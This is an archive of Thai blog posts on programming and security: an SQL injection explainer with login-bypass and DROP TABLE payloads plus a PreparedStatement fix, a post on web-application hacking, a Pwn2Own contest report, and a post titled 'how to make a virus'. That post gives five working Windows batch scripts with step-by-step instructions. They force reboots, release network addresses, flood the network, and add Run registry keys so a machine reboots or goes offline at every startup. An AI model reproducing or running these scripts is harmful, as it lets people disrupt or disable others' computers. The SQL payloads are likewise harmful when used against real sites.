SQL Injection
คือ การที่ในเวปมีการรับข้อมูลจากผู้ใช้ แล้วนำไปใช้ในการสั่งให้ฐานข้อมูลทำงาน แล้ว ผู้ใช้พยายามที่จะหลอกโปรแกรมให้ทำงานนอกเหนือจากที่เราต้องการ หรือ หลอกให้โปรแกรมทำงานโดยผ่านการตรวจสอบเงื่อนไขบางอย่าง
Injection Flaws
หมาย ถึง แฮกเกอร์สามารถที่จะแทรก Malicious Code หรือ คำสั่งที่แฮกเกอร์ใช้ในการเจาะระบบส่งผ่าน Web Application ไปยังระบบภายนอกที่เราเชื่อมต่ออยู่ เช่น ระบบฐานข้อมูล SQL โดยวิธี SQL Injection หรือ เรียก External Program ผ่าน shell command ของระบบปฎิบัติการ เป็นต้น
ส่วนใหญ่แล้วแฮกเกอร์จะใช้วิธีนี้ในช่วง การทำ Authentication หรือการ Login เข้าระบบผ่านทาง Web Application เช่น Web Site บางแห่งชอบใช้ “/admin” ในการเข้าสู่หน้า Admin ของ ระบบ ซึ่งเป็นช่องโหว่ให้แฮกเกอร์สามารถเดาได้เลยว่า เราใช้ http://www.mycompany.com/admin ในการเข้าไปจัดการบริหาร Web Site ดังนั้นเราจึงควรเปลี่ยนเป็นคำอื่นที่ไม่ใช่ “/admin” ก็จะช่วยได้มาก
วิธีการทำ SQL injection
ก็ คือ แฮกเกอร์จะใส่ชื่อ username อะไรก็ได้แต่ password สำหรับการทำ SQL injection จะใส่เป็น Logic Statement ยกตัวอย่างเช่น ‘ or ’1′ = ’1 หรือ ” or “1″= “1 หรือ a’ or 1=1–
Query = “SELECT * FROM product WHERE Password=’$input’”;
แต่ผู้ใช้ทำการใส่ ข้อมูลเป็น a’ or 1=1–
ดังนั้น query ที่ได้จะเป้น
Query = “SELECT * FROM product WHERE Password=’a’ or 1=1–’”;
จะเห็นว่าเมื่อนำไช้งานแล้ว จะสามารถเรียกดูข้อมูลได้เสมอ เนื่องจาก 1=1 เป็นจริง
สมมุติว่า มีโค้ดต่อไปนี้ใน application และ parameter “userName” ซึ่งประกอบด้วย
ชื่อผู้ใช้ ช่องโหว่แบบ SQL Injection เกิดขึ้นในโค้ดนี้:
statement := “SELECT * FROM users WHERE name = ‘” + userName + “‘;”
ถ้าป้อน “a’; DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%”
เข้าไปในส่วน “userName” จะทำให้เกิด SQL statement ต่อไปนี้
SELECT * FROM users WHERE name = ‘a’; DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%’;
ฐานข้อมูลจะเอ็กซิคิวท์ statement ตามลำดับ คือ select data, drop user table
และ select data ทำให้ผู้ใช้เว็ปสามารถดูหรือแก้ไขข้อมูลใด ๆ ที่อยู่ในฐานข้อมูล
ที่ผู้ใช้ที่เชื่อมโยงกับฐานข้อมูลสามารถอ่าน หรือแก้ไขได้
วิธีการป้องกัน
นัก พัฒนาระบบ (Web Application Developer) ควรจะระมัดระวัง input string ที่มาจากทางฝั่ง Client (Web Browser) และไม่ควรใช้วิธีติดต่อกับระบบภายนอกโดยไม่จำเป็น
ควรมีการ “กรอง” ข้อมูลขาเข้าที่มาจาก Web Browser ผ่านมาทางผู้ใช้ Client อย่างละเอียด และ ทำการ “กรอง” ข้อมูลที่มีลักษณะที่เป็น SQL injection statement ออกไปเสียก่อนที่จะส่งให้กับระบบฐานข้อมูล SQL ต่อไป
การใช้ Stored Procedure หรือ Trigger ก็เป็นทางออกหนึ่งในการเขียนโปรแกรมสั่งงานไปยังระบบฐานข้อมูล SQL ซึ่งมีความปลอดภัยมากกว่าการใช้ “Dynamic SQL Statement ” กับฐานข้อมูล SQL ตรงๆ
ช่องโหว่แบบ SQL Injection สามารถแก้ไขได้ใน programming language ส่วนใหญ่
ในภาษา Java ควรมีการใช้ PreparedStatement class
แทนที่จะใช้
Connection con = (acquire Connection)
Statement stmt = con.createStatement();
ResultSet rset = stmt.executeQuery(“SELECT * FROM users WHERE name = ‘” + userName + “‘;”);
ให้ใช้โค้ดต่อไปนี้แทน
Connection con = (acquire Connection)
PreparedStatement pstmt = con.prepareStatement(“SELECT * FROM users WHERE name = ?”);
pstmt.setString(1, userName);
ResultSet rset = stmt.executeQuery();
ความเห็น : 3 Comments »
ป้ายกำกับ: น่ารู้, computer securities, development, hacker, programmer
หมวดหมู่ : MyDev, Programmimg, Security
Knowledge Hackers Vs. Web Application Programmer
16 01 2009Hacker ในอดีตแตกต่างจาก Hacker ในปัจจุบันและอนาคต เนื่องจาก Hacker ในอดีตนั้น มักจะเป็นผู้ที่มีความเชี่ยวชาญด้าน TCP/IP protocol suite หรือการเขียนโปรแกรมภาษา C อย่างลึกซึ้ง Hacker มักจะใช้ Exploit หรือ โปรแกรมเจาะระบบ เจาะผ่านทาง Port ต่างๆ ที่เปิดให้บริการบน Server ของเรา เช่น FTP Server จะเปิด Port 20 และ 21, Sun RPC บน Solaris Platform เปิด Port “Sun RPC” 111 เป็นต้น โดย Hacker นิยมเจาะระบบ Unix ผ่านทาง Port RPC โดยใช้ Exploit ของ Port 111 ซึ่งปกติจะเป็น Port Default ของ Solaris อยู่แล้ว (ข้อมูลเพิ่มเติมอ่านได้ที่ www.sans.org/top20)
แต่ในปัจจุบัน Hacker จำเป็นต้องมีการเปลี่ยนแปลงพฤติกรรมในการเจาะระบบเนื่องจาก ระบบส่วนใหญ่มีการป้องกันโดยใช้ Firewall และ มักจะปิด Port ต่างๆ ที่ไม่จำเป็น ตลอดจนปิดแม้กระทั่ง ICMP ซึ่งจะทำให้ Hacker ไม่สามารถใช้คำสั่ง PING มายังเครื่องของเราได้ โดยเราจะเปิด Port สำหรับการใช้งานผ่านทาง Web เท่านั้น คือ Port HTTP 80 และ HTTPS 443 (SSL) จะเห็นได้ว่า Hacker นั้นไม่สามารถเจาะระบบโดยใช้ Exploit เดิมๆ เพราะ Port ต่างๆ ถูกปิดโดย Firewall เรียบร้อยแล้ว ดังนั้น จึงเป็นที่มาของ การ Hack ในแนวใหม่ (Next Generation Hacking) ก็คือ “Web Application Hacking” เจาะเฉพาะ Port 80 และ Port 443 (เพราะ Firewall ของทุกองค์กรยังไงก็ต้องเปิด Port 80 เพื่อให้คนภายนอกเข้ามาเยี่ยมชม Website)
Hacker ในปัจจุบันจึงจำเป็นต้องมีความรู้ด้านการเขียนโปรแกรม Web Application ด้วย ถ้าเป็น Windows Platform ก็ต้องศึกษาเกี่ยวกับ IIS Web Server, Active Server Page (ASP) หรือถ้าใช้ Unix/Linux Platform ก็ต้องศึกษาเกี่ยวกับ Apache Web Server, mod_SSL, PERL หรือภาษายอดนิยม PHP และ Java Server Page (JSP) เป็นต้น
แน่นอนว่า Web Application นั้นถูกเขียนโดย Web Programmer ส่วนใหญ่มักจะมีความเชี่ยวชาญในการเขียนภาษา ASP หรือ PHP บางคนก็ชอบใช้ Content Management System เช่น PHPnuke (www.phpnuke.org) หรือ PHPbb (www.phpbb.com) ซึ่งล้วนแต่มีช่องโหว่ให้กับ Hacker โดยปกติแล้ว Web Programmer มักจะไม่ได้สนใจเรื่องของ Security โดยตรง จะมีเพียงบางคนที่ศึกษาเรื่องนี้อย่างจริงจัง ดังนั้นการเขียน Web Application ที่ไม่ได้คำนึงถึงด้าน Web Application Security นั้น จึงเป็นการเปิดช่องให้กับ Hacker ในการเจาะระบบ ผ่านทาง Port 80 หรือ Port 443 ได้อย่างง่ายดาย โดยที่ Firewall ไม่สามารถที่จะป้องกันได้เลย
การเจาะระบบผ่านทาง Port 80 หรือ 443 นั้น ไม่ยากอย่างที่เราคิด ลองตรวจสอบระบบของเราเองดู ด้วยวิธีการที่เรียกกันในกลุ่มคนที่ทำงานด้าน Information Security ว่า “Vulnerability Assessment” โดยใช้โปรแกรมจำลองการเจาะระบบ ตัวอย่างเช่นโปรแกรม N-Stealth จาก Website http://www.nstalker.com เราจะพบว่า Web Server ของเรา ไม่ว่าจะเป็น IIS หรือ Apache ล้วนมีช่องโหว่ที่ Hacker สามารถมองเห็นโดยโปรแกรมจะวิเคราะห์ช่องโหว่ใน CGI Script, PERL Script ตลอดจน ASP, PHP, Cold Fusion และ JSP Script ด้วย
ช่องโหว่ใน Web Application นั้น มีหลายประเภทเช่น Hidden Manipulation, Cookie Poisoning, Buffer Overflow, SQL Injection, Cross Site Scripting (XSS) Flaws (ซึ่งผมจะกล่าวรายละเอียดในฉบับต่อไป)
ถามว่าวันนี้เรามีทั้ง Firewall และ IDS ในระบบของเราแล้วเราจะปลอดภัยจากการโจมตีของ Hacker หรือไม่ คำตอบก็คือ ไม่ได้ 100% เพราะยังไงเราก็ต้องเปิด Port ให้คนเข้ามาที่ Web Server ของเราอยู่ดี และ Web Application Programmer ส่วนใหญ่ก็ไม่ได้มีความรู้ในระดับของ Hacker ตลอดจนงานพัฒนาโปรแกรมนั้นก็มักจะเป็นงานที่เร่งรีบเสียจนไม่มีเวลาที่จะมา ตรวจสอบ Source Code เพื่อความปลอดภัยของระบบ ดัง นั้นทางแก้ไขแบบบูรณาการก็คือ เราต้องถ่ายทอดความรู้ด้าน “Web Application Security” ให้กับโปรแกรมเมอร์ เพื่อโปรแกรมเมอร์จะได้มีความตระหนักถึงการจู่โจมของ Hacker เรียกว่าสร้าง “Security Awareness” ตลอดจนมีการนำ Source Code มาตรวจสอบทั้งแบบ Manual และ Automated โดยใช้ Tools ที่มีอยู่มากมายใน Internet ก็สามารถจะช่วยลดความเสี่ยงที่เกิดขึ้นกับ Web Application ของเราได้กว่า 50 %
ความเห็น : Leave a Comment »
ป้ายกำกับ: แฮกเกอร์, computer securities, hacker, programmer
หมวดหมู่ : Security, Web development
สร้าง Web Application ใน 6 นาที (ด้วย Java ซะด้วย)
7 01 2009เป็นที่ยอมรับกันทั่วไปว่า Prototype นั้นเริ่มเป็นที่นิยมในบรรดา JavaScript Library ทั้งหลาย แต่สำหรับ Java programmer แล้ว การใช้ Prototype เป็นเรื่องน่าปวดหัวอยู่ไม่น้อยครับ พอดีไปเจองานของ Jason Bell ออก alpha release ของ JSP Tag library ใหม่ใน sourceforge.net ตั้งชื่อว่า “prototaglib” เห็นชื่อก็คงเดาออกว่าเป็น JSP tag library สำหรับเรียกใช้ prototype
การทำงานเจ้าตัวคุยว่าเหมือน Ruby On Rails แถมมี screencast แสดงตัวอย่างคล้ายๆกับตัวอย่างยอดนิยมของ Ruby on Rails ออกมาบนเว็ปไซต์ด้วย เป็นการสร้าง web application ทั้งตัวโดยใช้ Flickr API โดยทำงานทั้งหมดบน NetBeans IDE ใช้เวลาสร้าง web application ตัวอย่างนี้แค่ 6 นาที
น่าสนใจดีครับ เพราะสามารถสร้าง link หรือ form based remote tags ที่เรียก servlet หรือ jsp ให้แสดงผลใน
ลองไปดู Screencast แสดงการสร้าง web app ดังกล่าวรวมทั้ง download มาลองได้ที่เว็ปครับ Link
ที่มา : http://www.blognone.com/node/3743
ความเห็น : Leave a Comment »
ป้ายกำกับ: คอมพิวเตอร์, เทคโนโลยี, เว็บ, programmer, web apps
หมวดหมู่ : Programmimg
การแข่งขัน HACK OS หรือ การเจาะ ระบบปฏิบัติการคอมพิวเตอร์
7 01 2009เก็บตกสีสันงานแข่งแฮกเมืองมะ กัน Vista-MacBook ถูกเจาะเรียบเหลือแต่ลินุกส์
สรุป ผลการแข่งขันเจาะระบบคอมพิวเตอร์ในงานประชุม CanSecWest ที่สหรัฐอเมริกา ปรากฎว่าผู้เข้าแข่งขันสามารถเจาะไข่แดง MacBook Air คอมพิวเตอร์แมคอินทอชบางเฉียบล่าสุดจากแอปเปิลได้ในเวลา 2 นาที คิวต่อมาคือระบบปฏิบัติการ Vista ในโน้ตบุ๊ก Fujitsu ถูกเจาะระบบสำเร็จในวันสุดท้ายของการแข่งขัน เหลือเพียง ซอฟต์แวร์ระบบปฏิบัติการลินุกส์ (Linux) ซึ่งติดตั้งใน Sony Vaio ที่ไม่มีนักแฮกรายใดเจาะระบบจนสำเร็จ
งานประชุม CanSecWest นี้จัดขึ้นเมื่อปลายสัปดาห์ที่ผ่านมาโดยมีบริษัท TippingPoint ในเครือ 3Com เป็นผู้สนับสนุนหลัก การแข่งขันเจาะระบบจัดขึ้นโดยทีมงานจัดหาคอมพิวเตอร์โน้ตบุ๊ก 3 เครื่องซึ่งมีระบบปฏิบัติการคนละชนิดคนละค่าย กติกาคือผู้แข่งขันจะต้องเจาะระบบคอมพิวเตอร์เครื่องใดเครื่องหนึ่งและเข้า ไปติดตั้งซอฟต์แวร์ของตัวเองลงในคอมพิวเตอร์เครื่องนั้น ใครสามารถทำได้ในวันแรกรับเงินรางวัลไปเลย 20,000 เหรียญสหรัฐฯ แต่ถ้าใครสามารถแฮกในวันที่สองของการแข่งขัน เงินรางวัลจะลดลงครึ่งหนึ่งเหลือ 10,000 เหรียญ เพื่อไม่ให้นักแฮกเคร่งเครียดจนเกินไป
วันแรกผ่านไปโดยที่นักแฮกตีไข่ไม่แตก แต่วันที่สอง Charlie Miller จากบริษัทรักษาความปลอดภัย Independent Security Evaluators สามารถสอย MacBook Air โดยใช้ช่องโหว่ในซอฟต์แวร์เว็บบราวเซอร์ Safari สำเร็จ หลังจากมุ่งเจาะระบบเพียง 2 นาที Miller ก็กลับบ้านพร้อมเงินรางวัล 10,000 เหรียญเมื่อวันพฤหัสบดีที่ผ่านมา
สำหรับ Vista นั้นถูกเจาะโดย Shane Macaulay ใช้เวลาเจาะนานกว่า 2 วันก่อนจะสามารถทำได้สำเร็จในวันศุกร์ ได้รับความช่วยเหลือจากเพื่อนนาม Derek Callaway เล็กน้อย จุดนี้รายงานระบุว่าผิดแผนเพราะ Macaulay ไม่ได้คิดว่าจะต้องมาเจาะระบบ Vista Service Pack 1 ซึ่งมีระบบป้องกันภัยสูงกว่า
ตามกฎการแข่งขัน Macaulay และ Miller จะไม่สามารถเปิดเผยรายละเอียดการเจาะระบบได้จนกว่าแอปเปิลและไมโครซอฟท์จะ แก้ปัญหาที่เกิดขึ้นแล้วเสร็จ Macaulay จึงให้สัมภาษณ์เพียงว่ารูรั่วซึ่งเค้าใช้เป็นช่องทางในการเจาะระบบคือช่อง โหว่ระหว่าง 2 แพลตฟอร์มคือ Java และระบบความปลอดภัยของ Vista และเป็นไปได้ที่ความผิดพลาดนี้จะเกิดขึ้นทั้งในระบบปฏิบัติการลินุกส์และแมค โอเอสเท็น (Mac OS X)
และแม้ผู้เข้าแข่งขันหลายคนจะเลือกเจาะระบบปฏิบัติการลินุกส์ แต่ก็ไม่มีใครทำสำเร็จ จุดนี้ผู้จัดค่อนข้างประหลาดใจเนื่องจากผู้เข้าแข่งขันในจำนวน 400 คนรายงานว่าพบจุดบกพร่องจำนวนหนึ่งในลินุกส์ แต่ก็ไม่มีใครพยายามเจาะเข้าไปเพื่อเอาชนะการแข่งขัน
ด้าน Miller ระบุว่าเลือกเจาะระบบปฏิบัตการ Mac เพราะคิดว่าเป็นเป้าหมายที่ง่ายที่สุด ต่างจาก Macaulay ที่ระบุว่าเลือก Vista เพราะคิดว่ายังไงซะก็ต้องเลือก Vista
ความเห็น : 1 ความคิดเห็น »
ป้ายกำกับ: คอมพิวเตอร์, น่าคิด, แฮกเกอร์, computer securities, programmer
หมวดหมู่ : MyDev, Security
วิธี สร้างไวรัส สดๆ ศึกษาแต่อย่าลองนะครับ
5 01 2009ไวรัส #1 กดแล้ว ปิดเครื่อง
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆทั้งสิ้น
Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t0
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
=============================================
ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต
Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
=============================================
Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง
Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
=============================================
*ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว
Virus#4 Disble IP Address
โดนตัวนี้เข้าไปก็อย่าหวังเลยว่าจะเข้าอินเตอร์เน็ตได้อีก – -’
Code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Unlocker Hackers Strike Again
PAUSE
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
=============================================
Virus#5 สั่งปิดเครื่องทุกๆครั้งที่เปิดจนถึง11วินาที (เปิดแล้วก็ปิดอยู่อย่างนั้น)
code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Unlocker Hackers Strike Again
PAUSE
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat
***อย่าดับเบิลคลิกเพื่อ ทดลองเด็ดขาด***
เรียนรู้เพื่อป้องกัน ไม่ใช่แกล้งคนอื่นนะครับ ถ้าอยากลองต้องใช้พวกโปรแกรมจำลองเครื่องทดสอบดีกว่าครับ VMWARE หรือโปรแกรมตระกูลประมาณนี้แหละครับ ลองเองที่เครื่องเลยจะเสี่ยงไปหน่อย ขอเตือนแบบจริง!
ความเห็น : 3 Comments »
ป้ายกำกับ: คอมพิวเตอร์, น่ารู้, ไวรัส, computer securities, programmer, virus
หมวดหมู่ : Security
มารู้จักกับ xhtml กันก่อน
25 12 2008XHTML (Extensible HyperText Markup Language) มาตรฐานใหม่ เพราะว่า html แบบเดิมๆนั้น ไม่สามารถแสดงผลได้ตรงกันในทุก browser ได้นั่นเอง ทาง องค์กร W3C จึงได้กำหนดมาตรฐานใหม่ เป็น xhtml โดยนำข้อดีของ xml และ html มารวมเข้าด้วยกัน และเพิ่มกฎเกณฑ์บางประการ ให้มีความเข้มงวดมากยิ่งขึ้น เพื่อให้เป็นมาตรฐานเดียวกัน และแสดงผลในทุก browser ได้อย่างถูกต้อง
รูปแบบเอกสาร xhtml
………………….